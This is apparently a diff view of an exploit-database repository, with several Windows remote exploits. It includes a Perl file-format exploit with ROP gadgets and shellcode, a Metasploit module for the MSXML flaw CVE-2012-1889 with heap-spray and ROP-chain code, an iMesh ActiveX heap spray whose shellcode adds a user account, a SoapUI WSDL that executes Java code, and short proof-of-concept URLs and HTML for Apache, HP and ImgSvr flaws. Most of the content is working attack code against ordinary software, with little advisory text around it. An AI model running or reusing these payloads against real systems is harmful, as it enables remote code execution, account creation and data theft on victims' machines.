$rop_gadgets .= pack('V',0x77C5D305); # &Writable location [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c23b47); # POP EDI # RETN [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c47a42); # RETN (ROP NOP) [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c2ed13); # POP ESI # RETN [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c2aacc); # JMP [EAX] [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c12df9); # PUSHAD # RETN [msvcrt.dll]
$rop_gadgets .= pack('V',0x77c35459); # PUSH ESP # RETN [msvcrt.dll]
my $nops = "\x90" x 16;
# msfpayload windows/exec CMD=calc.exe
my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1".
@ -56,12 +76,12 @@ my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1".
"\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c".
"\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6";
my $evil = $nSEH.$SEH.$shellcode;
my $evil = $rop_gadgets.$nops.$shellcode;
my $sploit = $open.$junk1.$evil.$junk2.$evil.$junk3.$close;
my $sploit = $junk1.$evil.$junk2.$nSEH.$SEH.$junk3.$nSEH.$SEH.$junk4;
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE $sploit;
print FILE "<?xml version=\"$sploit\"?>";
close(FILE);
print "Exploit file created successfully [$filename]!\n";

304
platforms/windows/remote/19186.rb
View file

@ -1,49 +1,53 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "7.0",
:ua_maxver => "9.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
:method => "definition",
:rank => NormalRanking
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
'Name' => "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
'Description' => %q{
This module exploits a memory corruption flaw in Microsoft XML Core Services
when trying to access an uninitialized Node with the getDefinition API, which
may corrupt memory allowing remote code execution. At the moment, this module
only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.
may corrupt memory allowing remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'inking26', # Reliable exploitation
'binjo', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-1889' ],
[ 'BID', '53934' ],
[ 'OSVDB', '82873'],
[ 'MSB', 'MS12-043'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ]
[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],
[ 'URL', 'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]
],
'Payload' =>
{
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'ExitFunction' => "none",
'ExitFunction' => "process",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
@ -60,8 +64,62 @@ class Metasploit3 < Msf::Exploit::Remote
[
# msxml3.dll 8.90.1101.0
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ],
[ 'IE 7 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ]
[
'IE 6 on Windows XP SP3',
{
'Offset' => '0x100',
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 7 on Windows XP SP3 / Vista SP2',
{
'Offset' => '0x100',
'Rop' => nil,
'RandomHeap' => false
}
],
[
'IE 8 on Windows XP SP3',
{
'Rop' => :msvcrt,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
}
],
[
'IE 8 with Java 6 on Windows XP SP3',
{
'Rop' => :jre,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
],
[
'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
{
'Rop' => :jre,
'RandomHeap' => false,
'RopChainOffset' => '0x5f4',
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
],
[
'IE 9 with Java 6 on Windows 7 SP1',
{
'Rop' => :jre,
'RandomHeap' => true,
'RopChainOffset' => 0x5FC,
'Offset' => '0x0',
'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jun 12 2012",
@ -81,11 +139,177 @@ class Metasploit3 < Msf::Exploit::Remote
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows Vista SP2
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
return targets[5] #IE 8 on Windows 7 SP1/Vista SP2
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6] #IE 9 on Windows 7 SP1
else
return nil
end
end
def ret(t)
case t['Rop']
when :msvcrt
return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
when :jre
return [ 0x7c347f98 ].pack("V") # RETN (ROP NOP) # msvcr71.dll
end
end
def popret(t)
case t['Rop']
when :msvcrt
return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
when :jre
return [ 0x7c376541 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcr71.dll
end
end
def get_rop_chain(t)
if t['RandomHeap']
adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
adjust << ret(t)
else
adjust = ret(t)
end
adjust << popret(t)
adjust << [ t['StackPivot'] ].pack("V")
adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
else
print_status("Using JRE ROP")
rop = generate_rop_payload('java','',{'pivot'=>adjust})
end
return rop
end
def get_easy_spray(t, js_code, js_nops)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
var nops_90 = unescape("#{js_90_nops}");
var rop_chain = unescape("#{js_rop}");
while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, #{t['Offset']});
var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_rop, js_code, js_90_nops)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var rop = unescape("#{js_rop}");
var code = unescape("#{js_code}");
var nops_90 = unescape("#{js_90_nops}");
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset_length = #{t['RopChainOffset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length - code.length);
var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
@ -97,31 +321,23 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
# Set payload depending on target
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
if not my_target['Rop'].nil?
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
end
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0xa70; i++) {
heap_obj.alloc(block);
}
JS
if my_target['RandomHeap']
js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
elsif not my_target['Rop'].nil?
js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
else
js = get_easy_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
@ -140,14 +356,23 @@ class Metasploit3 < Msf::Exploit::Remote
</script>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object><script>
document.getElementById("#{object_id}").object.definition(#{rand(1000)+1});
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
<script>
var obj = document.getElementById('#{object_id}').object;
var src = unescape("%u0c08%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(#{rand(999) + 1});
</script>
</body>
</html>
EOS
html = html.gsub(/^\t/, '')
html = html.gsub(/^ {4}/, '')
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
@ -157,9 +382,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
=begin
* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0
(e34.358): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

45
platforms/windows/remote/30897.html Executable file
View file

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/26916/info
iMesh is prone to a code-execution vulnerability because the application fails to sanitize user-supplied data, which can lead to memory corruption.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 7.1.0.37263 and prior versions are reported affected by this issue.
<html>
<object classid=&#039;clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9&#039;
id=&#039;IMWebControl&#039; /></object>
<SCRIPT language="javascript">
//add su one, user: sun pass: tzu
shellcode =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<77;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0707%u0707");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=77;i<144;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0909%u0909");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=144;i<500;i++){memory[i] = block+shellcode}
</script>
<script language=&#039;vbscript&#039;>
puf=218959117 &#039;set ecx to 0x0d0d0d0d
IMWebControl.SetHandler puf
puf=""
IMWebControl.ProcessRequestEx puf
</script>
</html>

13
platforms/windows/remote/30901.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/26939/info
Apache is prone to an information-disclosure vulnerability.
This issue occurs because Apache fails to properly associate file extensions with the correct engines when handling specially crafted requests for files on Windows SMB shares.
Attackers can leverage this issue to view arbitrary script files as plain text. Potentially sensitive information may be present in the script code. Information harvested could aid in further attacks.
This issue affects Apache 2.2.6 when serving PHP files from a Windows SMB share; other versions may also be affected.
NOTE: This issue may also occur when handling other filename extensions that use AddType directives to associate scripts or executables (e.g. '.cgi\', '.py\', '.rb\', etc.).
http://www.example.com/winshare/info.php\

125
platforms/windows/remote/30908.txt Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: SoapUI Remote Code Execution
# Date: 25.12.13
# Exploit Author: Barak Tawily
# Vendor Homepage: <http://www.soapui.org/> http://www.soapui.org/
# Software Link:
<http://www.soapui.org/Downloads/download-soapui-pro-trial.html>
http://www.soapui.org/Downloads/download-soapui-pro-trial.html
# Version: vulnerable before 4.6.4
# Tested on: Windows, should work at Linux as well
# CVE : CVE-2014-1202
Hey guys.
My name is Barak Tawily, I work for Appsec-Labs as information security
researcher.
I have been found remote code execution vulnerability in the SoapUI product,
which allows me to execute a java code to the victim's computer via
malicious WSDL/WADL file.
This vulnerability allows attacker to execute java code to any client's
machine that will use my WSDL file and will try to send request to the
remote server.
SoapUI allows the client execute code by entering a java code inside the
following tag, the java code will be executed when the client will try to
send request to the server:
${=JAVA CODE};
Thus, an attacker can make a malicious WSDL file, determine a malicious java
code as default value in one of the requests parameters, hence, when client
uses malicious WSDL file and will try to send a request the java code will
be executed.
The attack flow is:
1. The attacker makes a malicious web service with fake WSDL including
the java payload that will be executed on the victim.
2. The victim enters the soapUI program and will enter the malicious
WSDL address.
3. The victim decides to send a request to the server, and the java
code executed on the victim's machine.
4. The attacker succeed execute java code in the victim's machine, and
will take over it.
This vulnerability was check on the version (4.6.3), a proof of concept
video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0
malicious WSDL is attached.
Please let me know if the vulnerability is about to publish
Thanks, Barak.
<?xml version="1.0"?>
<definitions name="StockQuote"
targetNamespace="http://example.com/stockquote.wsdl"
xmlns:tns="http://example.com/stockquote.wsdl"
xmlns:xsd1="http://example.com/stockquote.xsd"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns="http://schemas.xmlsoap.org/wsdl/">
<types>
<schema targetNamespace="http://example.com/stockquote.xsd"
xmlns="http://www.w3.org/2000/10/XMLSchema">
<element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="string">
<complexType>
<all>
<element name="tickerSymbol" type="string"/>
</all>
</complexType>
</element>
<element name="TradePrice">
<complexType>
<all>
<element name="price" type="float"/>
</all>
</complexType>
</element>
</schema>
</types>
<message name="GetLastTradePriceInput">
<part name="body" element="xsd1:Payload"/>
</message>
<message name="GetLastTradePriceOutput">
<part name="body" element="xsd1:TradePrice"/>
</message>
<portType name="StockQuotePortType">
<operation name="Malicious_Request">
<input message="tns:GetLastTradePriceInput"/>
<output message="tns:GetLastTradePriceOutput"/>
</operation>
</portType>
<binding name="Exploit" type="tns:StockQuotePortType">
<soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
<operation name="Malicious_Request">
<soap:operation soapAction="http://example.com/GetLastTradePrice"/>
<input>
<soap:body use="literal"/>
</input>
<output>
<soap:body use="literal"/>
</output>
</operation>
</binding>
<service name="StockQuoteService">
<documentation>My first service</documentation>
<port name="StockQuotePort" binding="tns:StockQuoteSoapBinding">
<soap:address location="http://example.com/stockquote"/>
</port>
</service>
</definitions>

26
platforms/windows/remote/30920.html Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/26967/info
The HP eSupportDiagnostics ActiveX control is prone to multiple information-disclosure vulnerabilities.
An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page.
Successfully exploiting these issues allows remote attackers to obtain the contents of arbitrary files and registry values. Information harvested may aid in further attacks.
These issues affect 'hpediag.dll' 1.0.11.0; other versions may also be affected.
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var out = fileUtil.ReadTextFile(somePath);
var out = regUtil.ReadValue(somePath);
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="fileUtil" classid="clsid:CDAF9CEC-F3EC-4B22-ABA3-9726713560F8" />
<object id="regUtil" classid="clsid:0C378864-D5C4-4D9C-854C-432E3BEC9CCB" />
</body>
</html>

9
platforms/windows/remote/30939.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27033/info
ImgSvr is prone to a remote script-execution vulnerability because it fails to adequately sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects ImgSvr 0.6.21; other versions may also be vulnerable.
http://www.example.com/../[code]